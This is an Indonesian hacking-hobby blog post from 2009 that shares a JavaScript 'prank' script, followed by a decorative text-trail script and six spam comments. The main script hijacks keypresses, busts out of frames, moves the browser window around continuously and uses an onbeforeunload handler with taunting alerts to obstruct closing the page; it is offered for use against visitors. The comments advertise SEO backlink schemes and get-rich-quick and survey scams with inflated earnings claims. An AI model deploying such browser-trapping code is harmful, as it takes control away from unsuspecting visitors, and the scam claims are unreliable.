Friday, 2024-03-29, 3:33 PM
Welcome Guest | RSS
CHR†SER TH4 C0D3 BR34K3R
Main
Registration
Login
RUMAH KU

SEMUA CATATANKU
Shinobi [13]
di sini gw maw share sedikit tentang trik and tips hack web site ato local host..

Site friends
  • http://sikuruz.do.am/

  • Main » 2009 » November » 5 » scrip ngeblink windows tab
    4:44 AM
    scrip ngeblink windows tab
    <script type="text/javascript">
    <!--
    if (self.parent.frames.length && self.parent.frames.length != 0) self.parent.location = document.location;
    neva = "KENA DECH !!!\n\
    jangan tekan close\n\
    yah.. dah dibilang Malah Klik Close !!!\n\
    Bye bye....!!!";
    if(window.opera){
      window.onkeydown = function(e){
        if(e.keyCode != 18 && e.keyCode != 27 && e.keyCode != 32 && e.keyCode !=  115){
          if(Math.random() > .5) for(var i = 0; i < 35; i++) document.getElementById('roll').Back();
          else for(var i = 0; i < 53; i++) document.getElementById('roll').Forward();
          document.getElementById('roll').Play();
        }
        else if(e.keyCode == 115){
          for(x in neva.split('\n')){
            alert(neva.split('\n')[x]);
          }
        }
        return false;
      }
    }else{
      window.onkeydown = function(e){
        if(e.keyCode !=  13 && e.keyCode != 27 && e.keyCode != 32){
          if(Math.random() > .5) for(var i = 0; i < 35; i++) document.getElementById('roll').Back();
          else for(var i = 0; i < 53; i++) document.getElementById('roll').Forward();
          document.getElementById('roll').Play();
        }
        return false;
      }
    }
    /* document.onkeydown = function(){
      for(var i = 0; i < 35; i++) document.getElementById('roll').Back();
      document.getElementById('roll').Play();
      return false;
    } */
    window.resizeTo(640,800);
    window.moveTo(0,0);
    for (i = 1; i <= 800; i++){
    setTimeout('window.moveTo(1599,1199);', i+"000");
    i++;
    setTimeout('window.moveTo(0,1199);', i+"000");
    i++;
    setTimeout('window.moveTo(1599,0);', i+"000");
    i++;
    setTimeout('window.moveTo(0,0);', i+"000");
    }
    //-->
    </script>
     <style type="text/css">
    <!--
    .style1 {font-size: 24pt}
    .style2 {
       font-size: 18pt;
       color: #000066;
    }
    .style3 {font-size: 16pt}
    .style4 {color: #0033FF}
    .style6 {font-size: 24pt; color: #FF00FF; }
    .style8 {font-size: 24pt; color: #000066; }
    .style9 {color: #000099}
    -->
     </style>

    <body onbeforeunload="for(x in neva.split('\n')){ alert(neva.split('\n')[x]); } return false;">
    <script type="text/javascript">
    <!--
    if(window.attachEvent){
      document.body.onkeydown = function(){
        if(Math.random() > .5) for(var i = 0; i < 35; i++) document.getElementById('roll').Back();
        else for(var i = 0; i < 53; i++) document.getElementById('roll').Forward();
        document.getElementById('roll').Play();
        return false;
      }
    }
    //-->
    </script>

    <br>

    </body>

    <script>


    /* Circling text trail- by : Tim Tilton*/

    ;(function(){

    var msg = "...:: JUST SCRIPT LOVER ::...";
    var size = 24;
    var circleY = 0.75; var circleX = 2;
    var letter_spacing = 5;
    var diameter = 10;
    var rotation = 0.4;
    var speed = 0.3;

    if (!window.addEventListener && !window.attachEvent || !document.createElement) return;

    msg = msg.split('');
    var n = msg.length - 1, a = Math.round(size * diameter * 0.208333), currStep = 20,
    ymouse = a * circleY + 20, xmouse = a * circleX + 20, y = [], x = [], Y = [], X = [],
    o = document.createElement('div'), oi = document.createElement('div'),
    b = document.compatMode && document.compatMode != "BackCompat"? document.documentElement : document.body,

    mouse = function(e){
     e = e || window.event;
     ymouse = !isNaN(e.pageY)? e.pageY : e.clientY; // y-position
     xmouse = !isNaN(e.pageX)? e.pageX : e.clientX; // x-position
    },

    makecircle = function(){ // rotation/positioning
     if(init.nopy){
     o.style.top = (b || document.body).scrollTop + 'px';
     o.style.left = (b || document.body).scrollLeft + 'px';
     };
     currStep -= rotation;
     for (var d, i = n; i > -1; --i){ // makes the circle
     d = document.getElementById('iemsg' + i).style;
     d.top = Math.round(y[i] + a * Math.sin((currStep + i) / letter_spacing) * circleY - 15) + 'px';
     d.left = Math.round(x[i] + a * Math.cos((currStep + i) / letter_spacing) * circleX) + 'px';
     };
    },

    drag = function(){ // makes the resistance
     y[0] = Y[0] += (ymouse - Y[0]) * speed;
     x[0] = X[0] += (xmouse - 20 - X[0]) * speed;
     for (var i = n; i > 0; --i){
     y[i] = Y[i] += (y[i-1] - Y[i]) * speed;
     x[i] = X[i] += (x[i-1] - X[i]) * speed;
     };
     makecircle();
    },

    init = function(){ // appends message divs, & sets initial values for positioning arrays
     if(!isNaN(window.pageYOffset)){
     ymouse += window.pageYOffset;
     xmouse += window.pageXOffset;
     } else init.nopy = true;
     for (var d, i = n; i > -1; --i){
     d = document.createElement('div'); d.id = 'iemsg' + i;
     d.style.height = d.style.width = a + 'px';
     d.appendChild(document.createTextNode(msg[i]));
     oi.appendChild(d); y[i] = x[i] = Y[i] = X[i] = 0;
     };
     o.appendChild(oi); document.body.appendChild(o);
     setInterval(drag, 25);
    },

    ascroll = function(){
     ymouse += window.pageYOffset;
     xmouse += window.pageXOffset;
     window.removeEventListener('scroll', ascroll, false);
    };

    o.id = 'outerCircleText'; o.style.fontSize = size + 'px';

    if (window.addEventListener){
     window.addEventListener('load', init, false);
     document.addEventListener('mouseover', mouse, false);
     document.addEventListener('mousemove', mouse, false);
     if (/Apple/.test(navigator.vendor))
     window.addEventListener('scroll', ascroll, false);
    }
    else if (window.attachEvent){
     window.attachEvent('onload', init);
     document.attachEvent('onmousemove', mouse);
    };

    })();

    </script>
    Category: Shinobi | Views: 820 | Added by: erick | Rating: 0.0/0
    Total comments: 6
    6 mass traffic  
    0
    Most powerful&cost effective SEO and website traffic service in world get up to 100’000 forum backlinks now!

    Your chriser.ucoz.com website will get thousands of visitors/day using best backlink service available. See proof how website traffic increased from 400 to 4000 visitors/day and how your website can get same results - http://targeted-web-traffic.org

    We can post your marketing message up to 100’000 forums around the web, so your site get insane amount of backlinks
    and as a result your website will be ranked #1 positions in search engines and your website will get large amount of free, targeted online web traffic from search engines in very short time.

    Most affordable and most powerful service for web traffic and backlinks in the world!

    Are you ready to for massive traffic flood to your site? If yes then Order now: http://targeted-web-traffic.org

    5 DenNeokedeDes  
    0
    If you want to make $20-$50/hour and up to $3500/month of your time working at
    home part-time then this is the most important message you’re ever going to read...

    It may sound hard to believe, but it's true. There are thousands of companies out there who are willing to pay for your opinions regarding their products. This is an important part of product research, and they rely on people just like you for your honest opinion!

    Imagine getting paid for doing things like:

    - Trying out new menu items from popular restaurants
    - Take short surveys about new cars that are coming out soon
    - Give your opinion about new clothing and shoe designs
    But here's a problem, it's very hard to find out best survey site and you probably can waste too much time,
    but I just stumbled up website http://money-surveys.net where this guy Jack revealed his secret source where he registered and taking surveys in his free time and earning $265 within 12h and $1440 just within 2 weeks

    Click Here To read this amazing story :
    http://money-surveys.net

    4 essepHeda  
    0
    After getting more than 10000 visitors/day to my website I thought your chriser.ucoz.com website also need unstoppable flow of traffic...

    Use this BRAND NEW software and get all the traffic for your website you will ever need ...

    = = > > http://auto-massive-traffic.net

    In testing phase it generated 867,981 visitors and $540,340.

    Then another $86,299.13 in 90 days to be exact. That's $958.88 a
    day!!

    And all it took was 10 minutes to set up and run.

    But how does it work??

    You just configure the system, click the mouse button a few
    times, activate the software, copy and paste a few links and
    you're done!!

    Click the link BELOW as you're about to witness a software that
    could be a MAJOR turning point to your success.

    = = > > http://auto-massive-traffic.net

    3 essepHeda  
    0
    After getting more than 10000 visitors/day to my website I thought your chriser.ucoz.com website also need unstoppable flow of traffic...

    Use this BRAND NEW software and get all the traffic for your website you will ever need ...

    = = > > http://massive-traffic-to-your-site.com

    In testing phase it generated 867,981 visitors and $540,340.

    Then another $86,299.13 in 90 days to be exact. That's $958.88 a
    day!!

    And all it took was 10 minutes to set up and run.

    But how does it work??

    You just configure the system, click the mouse button a few
    times, activate the software, copy and paste a few links and
    you're done!!

    Click the link BELOW as you're about to witness a software that
    could be a MAJOR turning point to your success.

    = = > > http://massive-traffic-to-your-site.com

    2 prefrolla  
    0
    Make $1,000's Weekly with a Health Internet Business of Your Very Own

    Now get a complete fully-operational "Health eBiz" in a box!

    This amazing site:

    * Closes sales automatically for you!

    * Has a complete electronic sales manager that makes all upsells for you!

    * Collects subscribers and leads automatically!

    * Contains a complete "health e-Mall!"

    * Contains up to 90 additional income streams!

    * Contains several powerful videos!

    Has a "live" spokesmodel that walks out onto your visitors' screens and closes up to 396% MORE sales for you!

    Includes complete professional set-up by Expert Web Development & Programming Team!

    This NEW "Health Biz In a Box" complete and fully-operational website allows you to make all the cash you want from a fully-operational automatic cash-generating web business!

    Read how it works here:

    => http://www.home-businessreviews.com/Turnkey-Affiliate-Websites.html

    But rumor has it there may be a ceiling on the number of these Internet "health-biz" sites being given out in order to avoid everyone having one and risking market saturation.

    Join the ranks of these people above and read how it works by going to:

    => http://www.home-businessreviews.com/Turnkey-Affiliate-Websites.html

    1 Nagegrose  
    0
    Hi, This just came across my desk and I had to pass it on to you ASAP…
    Internet multi-millionaire Mack Michaels has a few new positions available right now…
    If accepted you can easily rake in $11, 917 per month starting from scratch.
    ==> http://www.maverickmoneymaking.info/maverick.html
    Once you’re accepted just follow the training Mack gives you. It’s really quite simple…
    Learn how Mack went from not being able to afford Christmas gifts to a millionaire lifestyle and how you can too!
    BUT…
    Due to the extremely high level of Hands-On time Mack spends with every new member he has to limit the number of positions that are open.
    Right now there are only 2 available in your area. If you’re interested you should move quickly.
    ==> http://www.maverickmoneymaking.info/maverick.html
    Your Friend, – Mike

    Name *:
    Email *:
    Code *:
    Entries archive

    Our poll
    wajahmu ganteng/cantik gak?
    Total of answers: 23


    Copyright MyCorp © 2024